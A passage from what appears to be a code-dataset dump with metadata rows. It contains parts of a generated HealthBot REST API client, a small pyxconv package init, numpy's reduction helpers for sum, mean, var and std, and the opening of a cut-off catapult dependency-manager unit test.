:param str device: Name of the device. Multiple device should be separated by ','. This should be used along with deviceGroup. Without deviceGroup, this config will not be considered (required)
:param TsdbPostBody tsdb_query_body: Query TSDB body object
:param str measurement: Name of the measurement. Optional if topic/rule/trigger is used
:param str topic: Name of Healthbot topic. Optional if measurement is used
:param str rule: Name of Healthbot rule. Required if topic is used. Optional if measurement is used
:param str trigger: Name of Healthbot trigger. Optional if measurement is used or rule table is being queried
:param str fields: Fields that needs to be retrieved. Use * for to query all fields. Eg: fields=field1, field2
:param str order: Sort points in descending order based on time. By default points will be sorted in ascending order. Eg: order=desc
:param str group_by: Group results based on specified tags. Use * to group by all tags. Eg: groupBy=key1, key2
:param str limit: Limit number of points in the result. If groupBy is used limit is applied per group. Eg: limit=10
:param str where: Where clause filters data based on fields, tags, and/or timestamps. Eg: where=\"interface-name\" = 'ge-0/0/1' and \"in-pkts\" > 0
:param str q: Influx query string. Use this when custom query format does not support a query
:return: TsdbResults
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.query_tsdb_post_with_http_info(db, device_group, device, **kwargs) # noqa: E501
else:
(data) = self.query_tsdb_post_with_http_info(db, device_group, device, **kwargs) # noqa: E501
return data
def query_tsdb_post_with_http_info(self, db, device_group, device, **kwargs): # noqa: E501
"""TSDB query # noqa: E501
Query TSDB # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.query_tsdb_post_with_http_info(db, device_group, device, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str db: Name of the database. Multiple databases should be separated by ','. '*' can be used to specify all databases. (required)
:param str device_group: Name of the deviceGroup(s). Multiple device groups should be separated by ','. This can be used in combination with device, but is not mandatory. If device is given, then query will be executed only for that particular devices in the given device group, else all devices in group will be considered. Given devices will be applicable for all give device-groups. (required)
:param str device: Name of the device. Multiple device should be separated by ','. This should be used along with deviceGroup. Without deviceGroup, this config will not be considered (required)
:param TsdbPostBody tsdb_query_body: Query TSDB body object
:param str measurement: Name of the measurement. Optional if topic/rule/trigger is used
:param str topic: Name of Healthbot topic. Optional if measurement is used
:param str rule: Name of Healthbot rule. Required if topic is used. Optional if measurement is used
:param str trigger: Name of Healthbot trigger. Optional if measurement is used or rule table is being queried
:param str fields: Fields that needs to be retrieved. Use * for to query all fields. Eg: fields=field1, field2
:param str order: Sort points in descending order based on time. By default points will be sorted in ascending order. Eg: order=desc
:param str group_by: Group results based on specified tags. Use * to group by all tags. Eg: groupBy=key1, key2
:param str limit: Limit number of points in the result. If groupBy is used limit is applied per group. Eg: limit=10
:param str where: Where clause filters data based on fields, tags, and/or timestamps. Eg: where=\"interface-name\" = 'ge-0/0/1' and \"in-pkts\" > 0
:param str q: Influx query string. Use this when custom query format does not support a query
:return: TsdbResults
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['db', 'device_group', 'device', 'tsdb_query_body', 'measurement', 'topic', 'rule', 'trigger', 'fields', 'order', 'group_by', 'limit', 'where', 'q'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method query_tsdb_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'db' is set
if ('db' not in params or
params['db'] is None):
raise ValueError("Missing the required parameter `db` when calling `query_tsdb_post`") # noqa: E501
# verify the required parameter 'device_group' is set
if ('device_group' not in params or
params['device_group'] is None):
raise ValueError("Missing the required parameter `device_group` when calling `query_tsdb_post`") # noqa: E501
# verify the required parameter 'device' is set
if ('device' not in params or
params['device'] is None):
raise ValueError("Missing the required parameter `device` when calling `query_tsdb_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'db' in params:
query_params.append(('db', params['db'])) # noqa: E501
if 'device_group' in params:
query_params.append(('deviceGroup', params['device_group'])) # noqa: E501
if 'device' in params:
query_params.append(('device', params['device'])) # noqa: E501
if 'measurement' in params:
query_params.append(('measurement', params['measurement'])) # noqa: E501
if 'topic' in params:
query_params.append(('topic', params['topic'])) # noqa: E501
if 'rule' in params:
query_params.append(('rule', params['rule'])) # noqa: E501
if 'trigger' in params:
query_params.append(('trigger', params['trigger'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
if 'order' in params:
query_params.append(('order', params['order'])) # noqa: E501
if 'group_by' in params:
query_params.append(('groupBy', params['group_by'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'where' in params:
query_params.append(('where', params['where'])) # noqa: E501
if 'q' in params:
query_params.append(('q', params['q'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'tsdb_query_body' in params:
body_params = params['tsdb_query_body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/octet-stream']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tsdb/query', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TsdbResults', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def retrieve_available_nodes(self, **kwargs): # noqa: E501
"""List of available nodes # noqa: E501
Get the list of available nodes in the installation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_available_nodes(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_iam_token: authentication header object
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.retrieve_available_nodes_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.retrieve_available_nodes_with_http_info(**kwargs) # noqa: E501
return data
def retrieve_available_nodes_with_http_info(self, **kwargs): # noqa: E501
"""List of available nodes # noqa: E501
Get the list of available nodes in the installation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_available_nodes_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_iam_token: authentication header object
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['x_iam_token'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method retrieve_available_nodes" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_iam_token' in params:
header_params['x-iam-token'] = params['x_iam_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/nodes/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def retrieve_sensor_device_group(self, device_group_name, **kwargs): # noqa: E501
"""Get all All API's. # noqa: E501
GET sensors subscribed for a device-group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_sensor_device_group(device_group_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str device_group_name: Device Group (required)
:param str x_iam_token: authentication header object
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.retrieve_sensor_device_group_with_http_info(device_group_name, **kwargs) # noqa: E501
else:
(data) = self.retrieve_sensor_device_group_with_http_info(device_group_name, **kwargs) # noqa: E501
return data
def retrieve_sensor_device_group_with_http_info(self, device_group_name, **kwargs): # noqa: E501
"""Get all All API's. # noqa: E501
GET sensors subscribed for a device-group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_sensor_device_group_with_http_info(device_group_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str device_group_name: Device Group (required)
:param str x_iam_token: authentication header object
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['device_group_name', 'x_iam_token'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method retrieve_sensor_device_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'device_group_name' is set
if ('device_group_name' not in params or
params['device_group_name'] is None):
raise ValueError("Missing the required parameter `device_group_name` when calling `retrieve_sensor_device_group`") # noqa: E501
collection_formats = {}
path_params = {}
if 'device_group_name' in params:
path_params['device_group_name'] = params['device_group_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_iam_token' in params:
header_params['x-iam-token'] = params['x_iam_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/config/sensor/device-group/{device_group_name}/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def retrieve_system_details(self, **kwargs): # noqa: E501
"""Retrieve system details. # noqa: E501
Retrieve system details for HealthBot system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_system_details(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_iam_token: authentication header object
:param str service_name: service name takes in the name of the service for which details are required.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.retrieve_system_details_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.retrieve_system_details_with_http_info(**kwargs) # noqa: E501
return data
def retrieve_system_details_with_http_info(self, **kwargs): # noqa: E501
"""Retrieve system details. # noqa: E501
Retrieve system details for HealthBot system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_system_details_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_iam_token: authentication header object
:param str service_name: service name takes in the name of the service for which details are required.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['x_iam_token', 'service_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method retrieve_system_details" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'service_name' in params:
query_params.append(('service_name', params['service_name'])) # noqa: E501
header_params = {}
if 'x_iam_token' in params:
header_params['x-iam-token'] = params['x_iam_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/system-details/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def retrieve_tsdb_counters(self, **kwargs): # noqa: E501
"""TSDB counters # noqa: E501
Get TSDB counters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_tsdb_counters(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_iam_token: authentication header object
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.retrieve_tsdb_counters_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.retrieve_tsdb_counters_with_http_info(**kwargs) # noqa: E501
return data
def retrieve_tsdb_counters_with_http_info(self, **kwargs): # noqa: E501
"""TSDB counters # noqa: E501
Get TSDB counters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_tsdb_counters_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_iam_token: authentication header object
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['x_iam_token'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method retrieve_tsdb_counters" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_iam_token' in params:
header_params['x-iam-token'] = params['x_iam_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tsdb-counters/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 46.800239 | 404 | 0.632409 | 4,854 | 39,125 | 4.907499 | 0.053976 | 0.046682 | 0.028546 | 0.021158 | 0.959322 | 0.956803 | 0.950212 | 0.94106 | 0.94106 | 0.940179 | 0 | 0.016499 | 0.278083 | 39,125 | 835 | 405 | 46.856287 | 0.826872 | 0.425278 | 0 | 0.823129 | 1 | 0 | 0.19366 | 0.035693 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034014 | false | 0 | 0.00907 | 0 | 0.092971 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c3078c783cbf9f7936e22fdc19076a799c41990a | 152 | py | Python | pyxconv/__init__.py | sheevy/XConv | fbfe52eefb23f6b32645dc837612ce5257b6595e | [
"MIT"
] | 4 | 2021-06-20T14:58:48.000Z | 2021-12-22T16:44:49.000Z | pyxconv/__init__.py | sheevy/XConv | fbfe52eefb23f6b32645dc837612ce5257b6595e | [
"MIT"
] | 1 | 2021-12-21T16:32:04.000Z | 2021-12-21T16:32:04.000Z | pyxconv/__init__.py | sheevy/XConv | fbfe52eefb23f6b32645dc837612ce5257b6595e | [
"MIT"
] | 1 | 2021-12-21T12:20:52.000Z | 2021-12-21T12:20:52.000Z | from .utils import * # noqa
from .probe import * # noqa
from .funcs import * # noqa
from .modules import * # noqa
from .mem_logger import * # noqa
| 25.333333 | 33 | 0.671053 | 21 | 152 | 4.809524 | 0.428571 | 0.49505 | 0.554455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.230263 | 152 | 5 | 34 | 30.4 | 0.863248 | 0.157895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c317358e1aa2223f55bd464e82adc018df9e5bfb | 7,130 | py | Python | numpy/core/_methods.py | WeatherGod/numpy | 5be45b280b258e158b93163b937f8f9c08d30393 | [
"BSD-3-Clause"
] | null | null | null | numpy/core/_methods.py | WeatherGod/numpy | 5be45b280b258e158b93163b937f8f9c08d30393 | [
"BSD-3-Clause"
] | null | null | null | numpy/core/_methods.py | WeatherGod/numpy | 5be45b280b258e158b93163b937f8f9c08d30393 | [
"BSD-3-Clause"
] | null | null | null | """
Array methods which are called by the both the C-code for the method
and the Python code for the NumPy-namespace function
"""
from __future__ import division, absolute_import, print_function
from numpy.core import multiarray as mu
from numpy.core import umath as um
from numpy.core.numeric import array, asanyarray, isnan, issubdtype
from numpy.core import numerictypes as nt
def _amax(a, axis=None, out=None, keepdims=False):
return um.maximum.reduce(a, axis=axis,
out=out, keepdims=keepdims)
def _amin(a, axis=None, out=None, keepdims=False):
return um.minimum.reduce(a, axis=axis,
out=out, keepdims=keepdims)
def _sum(a, axis=None, dtype=None, out=None, keepdims=False):
return um.add.reduce(a, axis=axis, dtype=dtype,
out=out, keepdims=keepdims)
def _prod(a, axis=None, dtype=None, out=None, keepdims=False):
return um.multiply.reduce(a, axis=axis, dtype=dtype,
out=out, keepdims=keepdims)
def _any(a, axis=None, dtype=None, out=None, keepdims=False):
return um.logical_or.reduce(a, axis=axis, dtype=dtype, out=out,
keepdims=keepdims)
def _all(a, axis=None, dtype=None, out=None, keepdims=False):
return um.logical_and.reduce(a, axis=axis, dtype=dtype, out=out,
keepdims=keepdims)
def _count_reduce_items(arr, axis):
if axis is None:
axis = tuple(range(arr.ndim))
if not isinstance(axis, tuple):
axis = (axis,)
items = 1
for ax in axis:
items *= arr.shape[ax]
return items
def _mean(a, axis=None, dtype=None, out=None, keepdims=False):
arr = asanyarray(a)
# Cast bool, unsigned int, and int to float64
if dtype is None and (issubdtype(arr.dtype, nt.integer) or
issubdtype(arr.dtype, nt.bool_)):
ret = um.add.reduce(arr, axis=axis, dtype='f8',
out=out, keepdims=keepdims)
else:
ret = um.add.reduce(arr, axis=axis, dtype=dtype,
out=out, keepdims=keepdims)
rcount = _count_reduce_items(arr, axis)
if isinstance(ret, mu.ndarray):
ret = um.true_divide(ret, rcount,
out=ret, casting='unsafe', subok=False)
else:
ret = ret / float(rcount)
return ret
def _nanmean(a, axis=None, dtype=None, out=None, keepdims=False):
# Using array() instead of asanyarray() because the former always
# makes a copy, which is important due to the copyto() action later
arr = array(a, subok=True)
mask = isnan(arr)
# Cast bool, unsigned int, and int to float64
if dtype is None and (issubdtype(arr.dtype, nt.integer) or
issubdtype(arr.dtype, nt.bool_)):
ret = um.add.reduce(arr, axis=axis, dtype='f8',
out=out, keepdims=keepdims)
else:
mu.copyto(arr, 0.0, where=mask)
ret = um.add.reduce(arr, axis=axis, dtype=dtype,
out=out, keepdims=keepdims)
rcount = (~mask).sum(axis=axis)
if isinstance(ret, mu.ndarray):
ret = um.true_divide(ret, rcount,
out=ret, casting='unsafe', subok=False)
else:
ret = ret / float(rcount)
return ret
def _var(a, axis=None, dtype=None, out=None, ddof=0,
keepdims=False):
arr = asanyarray(a)
# First compute the mean, saving 'rcount' for reuse later
if dtype is None and (issubdtype(arr.dtype, nt.integer) or
issubdtype(arr.dtype, nt.bool_)):
arrmean = um.add.reduce(arr, axis=axis, dtype='f8', keepdims=True)
else:
arrmean = um.add.reduce(arr, axis=axis, dtype=dtype, keepdims=True)
rcount = _count_reduce_items(arr, axis)
if isinstance(arrmean, mu.ndarray):
arrmean = um.true_divide(arrmean, rcount,
out=arrmean, casting='unsafe', subok=False)
else:
arrmean = arrmean / float(rcount)
# arr - arrmean
x = arr - arrmean
# (arr - arrmean) ** 2
if issubdtype(arr.dtype, nt.complex_):
x = um.multiply(x, um.conjugate(x), out=x).real
else:
x = um.multiply(x, x, out=x)
# add.reduce((arr - arrmean) ** 2, axis)
ret = um.add.reduce(x, axis=axis, dtype=dtype, out=out, keepdims=keepdims)
# add.reduce((arr - arrmean) ** 2, axis) / (n - ddof)
if not keepdims and isinstance(rcount, mu.ndarray):
rcount = rcount.squeeze(axis=axis)
rcount -= ddof
if isinstance(ret, mu.ndarray):
ret = um.true_divide(ret, rcount,
out=ret, casting='unsafe', subok=False)
else:
ret = ret / float(rcount)
return ret
def _nanvar(a, axis=None, dtype=None, out=None, ddof=0,
keepdims=False):
# Using array() instead of asanyarray() because the former always
# makes a copy, which is important due to the copyto() action later
arr = array(a, subok=True)
mask = isnan(arr)
# First compute the mean, saving 'rcount' for reuse later
if dtype is None and (issubdtype(arr.dtype, nt.integer) or
issubdtype(arr.dtype, nt.bool_)):
arrmean = um.add.reduce(arr, axis=axis, dtype='f8', keepdims=True)
else:
mu.copyto(arr, 0.0, where=mask)
arrmean = um.add.reduce(arr, axis=axis, dtype=dtype,
keepdims=True)
rcount = (~mask).sum(axis=axis, keepdims=True)
if isinstance(arrmean, mu.ndarray):
arrmean = um.true_divide(arrmean, rcount,
out=arrmean, casting='unsafe', subok=False)
else:
arrmean = arrmean / float(rcount)
# arr - arrmean
x = arr - arrmean
mu.copyto(x, 0.0, where=mask)
# (arr - arrmean) ** 2
if issubdtype(arr.dtype, nt.complex_):
x = um.multiply(x, um.conjugate(x), out=x).real
else:
x = um.multiply(x, x, out=x)
# add.reduce((arr - arrmean) ** 2, axis)
ret = um.add.reduce(x, axis=axis, dtype=dtype, out=out,
keepdims=keepdims)
# add.reduce((arr - arrmean) ** 2, axis) / (n - ddof)
if not keepdims and isinstance(rcount, mu.ndarray):
rcount = rcount.squeeze(axis=axis)
rcount -= ddof
if isinstance(ret, mu.ndarray):
ret = um.true_divide(ret, rcount,
out=ret, casting='unsafe', subok=False)
else:
ret = ret / float(rcount)
return ret
def _std(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False):
ret = _var(a, axis=axis, dtype=dtype, out=out, ddof=ddof,
keepdims=keepdims)
if isinstance(ret, mu.ndarray):
ret = um.sqrt(ret, out=ret)
else:
ret = um.sqrt(ret)
return ret
def _nanstd(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False):
ret = _nanvar(a, axis=axis, dtype=dtype, out=out, ddof=ddof,
keepdims=keepdims)
if isinstance(ret, mu.ndarray):
ret = um.sqrt(ret, out=ret)
else:
ret = um.sqrt(ret)
return ret
| 35.65 | 78 | 0.593548 | 964 | 7,130 | 4.345436 | 0.129668 | 0.043925 | 0.049654 | 0.063022 | 0.871568 | 0.858677 | 0.852709 | 0.852709 | 0.83218 | 0.780377 | 0 | 0.004897 | 0.284011 | 7,130 | 199 | 79 | 35.829146 | 0.815671 | 0.116971 | 0 | 0.710345 | 0 | 0 | 0.007015 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.089655 | false | 0 | 0.034483 | 0.041379 | 0.213793 | 0.006897 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6f1140ce2ffc110e021d6ebfbb8a1ab17e361164 | 77,306 | py | Python | third_party/catapult/dependency_manager/dependency_manager/base_config_unittest.py | maidiHaitai/haitaibrowser | a232a56bcfb177913a14210e7733e0ea83a6b18d | [
"BSD-3-Clause"
] | 1 | 2020-09-15T08:43:34.000Z | 2020-09-15T08:43:34.000Z | third_party/catapult/dependency_manager/dependency_manager/base_config_unittest.py | maidiHaitai/haitaibrowser | a232a56bcfb177913a14210e7733e0ea83a6b18d | [
"BSD-3-Clause"
] | null | null | null | third_party/catapult/dependency_manager/dependency_manager/base_config_unittest.py | maidiHaitai/haitaibrowser | a232a56bcfb177913a14210e7733e0ea83a6b18d | [
"BSD-3-Clause"
] | null | null | null | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=unused-argument
import os
import unittest
from catapult_base import cloud_storage
import mock
from pyfakefs import fake_filesystem_unittest
from pyfakefs import fake_filesystem
import dependency_manager
from dependency_manager import uploader
class BaseConfigCreationAndUpdateUnittests(fake_filesystem_unittest.TestCase):
def setUp(self):
self.addTypeEqualityFunc(uploader.CloudStorageUploader,
uploader.CloudStorageUploader.__eq__)
self.setUpPyfakefs()
self.dependencies = {
'dep1': {'cloud_storage_bucket': 'bucket1',
'cloud_storage_base_folder': 'dependencies_folder',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash11',
'download_path': '../../relative/dep1/path1'},
'plat2': {
'cloud_storage_hash': 'hash12',
'download_path': '../../relative/dep1/path2'}}},
'dep2': {'cloud_storage_bucket': 'bucket2',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash21',
'download_path': '../../relative/dep2/path1'},
'plat2': {
'cloud_storage_hash': 'hash22',
'download_path': '../../relative/dep2/path2'}}}}
self.expected_file_lines = [
# pylint: disable=bad-continuation
'{', '"config_type": "BaseConfig",', '"dependencies": {',
'"dep1": {', '"cloud_storage_base_folder": "dependencies_folder",',
'"cloud_storage_bucket": "bucket1",', '"file_info": {',
'"plat1": {', '"cloud_storage_hash": "hash11",',
'"download_path": "../../relative/dep1/path1"', '},',
'"plat2": {', '"cloud_storage_hash": "hash12",',
'"download_path": "../../relative/dep1/path2"', '}', '}', '},',
'"dep2": {', '"cloud_storage_bucket": "bucket2",', '"file_info": {',
'"plat1": {', '"cloud_storage_hash": "hash21",',
'"download_path": "../../relative/dep2/path1"', '},',
'"plat2": {', '"cloud_storage_hash": "hash22",',
'"download_path": "../../relative/dep2/path2"', '}', '}', '}',
'}', '}']
self.file_path = os.path.abspath(os.path.join(
'path', 'to', 'config', 'file'))
self.new_dep_path = 'path/to/new/dep'
self.fs.CreateFile(self.new_dep_path)
self.new_dep_hash = 'A23B56B7F23E798601F'
self.new_dependencies = {
'dep1': {'cloud_storage_bucket': 'bucket1',
'cloud_storage_base_folder': 'dependencies_folder',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash11',
'download_path': '../../relative/dep1/path1'},
'plat2': {
'cloud_storage_hash': self.new_dep_hash,
'download_path': '../../relative/dep1/path2'}}},
'dep2': {'cloud_storage_bucket': 'bucket2',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash21',
'download_path': '../../relative/dep2/path1'},
'plat2': {
'cloud_storage_hash': 'hash22',
'download_path': '../../relative/dep2/path2'}}}}
self.new_bucket = 'bucket1'
self.new_remote_path = 'dependencies_folder/dep1_%s' % self.new_dep_hash
self.new_pending_upload = uploader.CloudStorageUploader(
self.new_bucket, self.new_remote_path, self.new_dep_path)
self.expected_new_backup_path = '.'.join([self.new_remote_path, 'old'])
self.new_expected_file_lines = [
# pylint: disable=bad-continuation
'{', '"config_type": "BaseConfig",', '"dependencies": {',
'"dep1": {', '"cloud_storage_base_folder": "dependencies_folder",',
'"cloud_storage_bucket": "bucket1",', '"file_info": {',
'"plat1": {', '"cloud_storage_hash": "hash11",',
'"download_path": "../../relative/dep1/path1"', '},',
'"plat2": {', '"cloud_storage_hash": "%s",' % self.new_dep_hash,
'"download_path": "../../relative/dep1/path2"', '}', '}', '},',
'"dep2": {', '"cloud_storage_bucket": "bucket2",', '"file_info": {',
'"plat1": {', '"cloud_storage_hash": "hash21",',
'"download_path": "../../relative/dep2/path1"', '},',
'"plat2": {', '"cloud_storage_hash": "hash22",',
'"download_path": "../../relative/dep2/path2"', '}', '}', '}',
'}', '}']
self.final_dep_path = 'path/to/final/dep'
self.fs.CreateFile(self.final_dep_path)
self.final_dep_hash = 'B34662F23B56B7F98601F'
self.final_bucket = 'bucket2'
self.final_remote_path = 'dep1_%s' % self.final_dep_hash
self.final_pending_upload = uploader.CloudStorageUploader(
self.final_bucket, self.final_remote_path, self.final_dep_path)
self.expected_final_backup_path = '.'.join([self.final_remote_path,
'old'])
self.final_dependencies = {
'dep1': {'cloud_storage_bucket': 'bucket1',
'cloud_storage_base_folder': 'dependencies_folder',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash11',
'download_path': '../../relative/dep1/path1'},
'plat2': {
'cloud_storage_hash': self.new_dep_hash,
'download_path': '../../relative/dep1/path2'}}},
'dep2': {'cloud_storage_bucket': 'bucket2',
'file_info': {
'plat1': {
